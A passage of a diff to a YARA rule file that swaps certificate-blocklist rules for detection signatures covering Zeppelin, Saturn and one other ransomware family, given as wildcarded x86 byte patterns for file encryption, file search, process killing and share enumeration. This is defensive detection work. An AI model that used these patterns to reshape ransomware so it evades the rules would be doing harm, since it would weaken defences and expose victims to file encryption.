?? 8B 85 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 + ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? B8 + } + $encrypt_files_p2 = { + E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 + ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 + ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 83 BD ?? ?? ?? ?? + ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8D 45 ?? + E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B 08 FF 51 ?? 83 + BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? + 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 + ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? ?? ?? 59 EB ?? + 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B + 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 B3 ?? 8D 45 ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 8D 95 ?? + ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B + F8 57 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 33 C0 5A 59 59 + 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $find_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? + ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 + ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 + ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? + ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 + ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 + 03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03 + C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 + 48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 + ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 + } + $enum_resources = { + 55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 55 ?? 33 D2 55 68 ?? ?? ?? ?? + 64 FF 32 64 89 22 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 ?? 52 50 6A ?? 6A + ?? 6A ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 89 + 45 ?? 8D 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D + ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 85 C0 0F 82 ?? ?? ?? ?? 40 89 45 ?? 8B 45 ?? 8B + 58 ?? 85 DB 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B + D3 E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 12 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? E8 + ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 52 ?? 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? B1 ?? + E8 ?? ?? ?? ?? 8D 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 55 ?? 8B + 08 FF 51 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? F7 + 40 ?? ?? ?? ?? ?? 76 ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 45 ?? ?? FF 4D ?? 0F 85 ?? ?? ?? + ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8 + ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 + 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? + ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Porral Twinware S.L.L." and pe.signatures[i].serial=="09:4b:f1:9d:50:9d:30:74:91:39:95:16:0b:19:5b:6c" and 1373241599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0A77Cf3Ba49B64E6Cbe5Fb4A6A6Aacc6 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Zeppelin : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Zeppelin ransomware." author = "ReversingLabs" - id = "4fb06917-ccbd-514c-a936-e337c31c6e65" - date = "2023-11-08" - modified = "2023-11-08" + id = "f5cf514d-4dd0-58b7-82d0-5cb516a139a3" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L459-L475" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3bebc4a36b57526505167d8f075d468e4775d66c81ce08644c506d9be94efba0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Zeppelin.yara#L1-L109" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8fb07e49d2ff9d497fb36a5d901748315ae519f5ef845d1a5ec6341d0eb1f68c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Zeppelin" + tc_detection_factor = 5 importance = 25 + strings: + $search_files_p1 = { + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 45 ?? E8 ?? + ?? ?? ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 2B D8 43 53 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 42 + 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 30 FF 75 ?? 68 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 83 F8 + ?? 7C ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 + ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + C3 + } + $search_files_p2 = { + 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? + ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 + 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D + ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? + 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? + ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C3 + } + $kill_processes = { + 55 8B EC 33 C9 51 51 51 51 51 51 51 51 53 56 57 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? + 88 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ?? + 64 FF 32 64 89 22 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B D8 8B 45 ?? 89 58 ?? 8B C3 B2 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? + C6 40 ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B F0 85 F6 + 7E ?? BB ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D + 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? 8D 55 ?? 8B 45 + ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 40 ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? + EB ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? + ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B1 ?? 33 + D2 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? + 8B 45 ?? 80 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5F + 5E 5B 8B E5 5D C3 + } + $enum_shares = { + 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 53 56 57 89 45 ?? 8B 45 ?? E8 ?? ?? + ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? 33 + D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 89 45 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B + 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 48 85 + C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 55 ?? 8B 45 ?? 8B + 18 FF 53 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 33 C0 55 68 ?? ?? ?? ?? 64 + FF 30 64 89 20 FF 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? 33 D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 + ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? + 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 + 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? FF 45 ?? + FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A + 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? + ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB + ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B D9 88 + 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C6 E8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 88 5E ?? 88 5E ?? 56 6A ?? 8D 46 ?? 50 B9 ?? ?? ?? ?? 33 D2 33 C0 E8 ?? + ?? ?? ?? 8B D8 89 5E ?? 85 DB 75 ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? + 89 45 ?? C6 45 ?? ?? 8D 45 ?? 50 6A ?? 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? + ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "I.ST.SAN. Srl" and pe.signatures[i].serial=="0a:77:cf:3b:a4:9b:64:e6:cb:e5:fb:4a:6a:6a:ac:c6" and 1371081599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($kill_processes) and ($enum_shares) and ( all of ($search_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1F4C22Da1107D20C1Eda04569D58E573 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Saturn : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Saturn ransomware." author = "ReversingLabs" - id = "4ff75d18-926e-51aa-8e1c-b9699669bbd0" - date = "2023-11-08" - modified = "2023-11-08" + id = "70a8d937-aee5-54d8-9409-c5d2d0830a2b" + date = "2020-10-19" + modified = "2020-10-19" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L477-L493" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fe19c4b21c3b70ec571461ca6d9c370a971c01f2d68e3c3916aa1fa0f13b20f8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Saturn.yara#L1-L105" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "efa748346ad8c46e654542d302e81d633a2d12f421636c477431a12a34636132" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Saturn" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_1 = { + 6A ?? C6 45 ?? ?? 8D 4D ?? 8B 3B 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 3B C8 74 ?? + 83 78 ?? ?? 8B C8 72 ?? 8B 08 FF 70 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 + 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 + ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 + ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A + } + $find_files_2_p1 = { + 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 + ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? FF 75 + ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? + ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D + 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 + ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? + 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? + ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 + 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? + E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 + } + $find_files_2_p2 = { + F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF + 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B F0 80 + BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 00 + ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B D0 + 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? F6 + 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 + } + $encrypt_files_p1 = { + 6A ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 89 9D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 6A ?? FF B5 + ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF D6 8B D8 + 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 57 + FF D6 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? + ?? ?? B9 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 + A5 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? + ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? + ?? ?? ?? 85 F6 0F 95 